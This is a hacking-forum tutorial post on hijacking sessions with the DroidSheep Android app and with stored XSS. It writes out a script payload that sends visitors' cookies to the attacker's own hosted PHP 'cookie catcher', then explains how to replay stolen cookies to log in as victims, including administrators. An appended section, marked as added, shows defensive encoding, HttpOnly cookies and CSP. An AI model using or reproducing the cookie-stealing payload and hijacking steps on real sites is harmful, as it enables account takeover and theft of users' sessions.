Session hijacking via ARP-Spoofing and XSS 01-31-2014, 06:18 PM
#1
Hello! This is my first tutorial so please do not flame me. So I found a cool, useful tool to make your life easier if you like session hijacking, and what makes it even cooler is that it is for Android phones and tablets (a rooted device is required).
[Step 1]
So google for droid sheep and look for the apk
![[Image: droid.PNG]](http://1.bp.blogspot.com/-tbwpIW0xuWo/UuvNJCETW3I/AAAAAAAAAMg/nczAHr8NnCA/s1600/droid.PNG)
[Step 2]
It's pretty easy from there: you just download it, run it and it should install, then you should definitely be able to go from there. Also, you have to be connected to your victim's network to use this.
![[Image: images+(5).jpg]](http://1.bp.blogspot.com/-iqtcD0rtRF8/UuvNuqVFmpI/AAAAAAAAAMo/F6ZyF1gevro/s1600/images+(5).jpg)
XSS Session hijacking
----------------------------------------------------------------------------------------------------------------------------
First you need to find something that is vulnerable to XSS (obviously), then you need to make sure other people can go to the XSS-vulnerable place. This will work in places with something like forums or a comment system.
[Step 1]
So to test the website for the vulnerability, put some JavaScript in the input that will alert a message. To do this, post <script>alert('XSS');</script> in the vulnerable input.
![[Image: images+(6).jpg]](http://1.bp.blogspot.com/-HjBzmG41MtE/UuvRJum07II/AAAAAAAAAM0/k9j5pQfGNKg/s1600/images+(6).jpg)
[Step 2]
If you get an alert from the page then it is vulnerable.
![[Image: IC65255.gif]](http://3.bp.blogspot.com/-ysKGAb38G6o/UuvRz3m70DI/AAAAAAAAAM8/S7K_OylG3PA/s1600/IC65255.gif)
[Step 3]
Since the code executed in the website, when people go to the post the code will run the <script>alert('XSS')</script> and then they get an alert. So now what you want to do is run malicious code that steals their session IDs and sends it to you so you can then open it in and be logged in as them. There are a lot of ways to do this. This is how I usually do it. First you need to go to a free hosting service where you can use PHP, like this free one http://www.110mb.com/. Then upload Cookie Catcher to your website. Download from here http://adf.ly/Tdbm
[Step 4]
Post this in the vulnerable input on the victim's website <script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script> (make sure to make the location to the website you made) and whenever a user goes to the vulnerable forum their cookies will go to a file in your directory called cookiecatcher.html. Open that and it should have the cookies from the users that have visited.
[Step 5]
To log in, go to the vulnerable website and replace the URL with this Javascript:void(document.cookie="") (replace "" with the stolen cookie) and it should go to the session containing that cookie, which will have them logged in, and there you go! You're in, and if you get the admin's session then you can usually mess with everyone's account registered with that website.
I hope it helped. I also used one of @1234hotmaster's posts as a reference. Again, this is my first tutorial so please do not flame me. Thanks! Also, if anyone has tips, advice, or suggestions on how to write tutorials I would love that.
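Added example, not part of the original post: the server-side controls that defeat both techniques described above, written as plain JavaScript with no framework. All function names, the cookie names and the sample values are hypothetical; `scriptVisibleCookies` is only a simplified model of what a browser exposes through `document.cookie`.

```javascript
// Defensive sketch (added example; all names are hypothetical).

// HTML-encode untrusted text before it is placed in element content
// or inside a quoted attribute, so markup in a comment stays inert.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render a forum comment; both fields are user-controlled.
function renderComment(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Build the Set-Cookie value for a session cookie.
//   HttpOnly : not readable from page script (document.cookie)
//   Secure   : only sent over HTTPS, so it is not exposed to sniffing
//              on a shared or ARP-spoofed network
//   SameSite : limits sending on cross-site requests
function sessionCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Second layer: a Content-Security-Policy response header that blocks
// inline <script> blocks even if an encoding step is missed somewhere.
const CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

// Simplified model of document.cookie: HttpOnly cookies are left out.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(";")[0].trim())
    .join("; ");
}

// Constructed sample input: the probe string from the post and a
// placeholder session value.
function demo() {
  const probe = "<script>alert('XSS');</script>";
  const headers = [
    sessionCookie("sid", "PLACEHOLDER_SESSION_ID"),
    "theme=dark; Path=/", // non-sensitive preference cookie
  ];
  return {
    html: renderComment("guest", probe),
    visible: scriptVisibleCookies(headers),
  };
}

console.log(demo());
```

With output encoding in place the probe is displayed as text instead of running, and an HttpOnly session cookie never appears in what injected script can read. Rotating the session ID at login and binding privileged actions to re-authentication limits the value of any cookie that does leak.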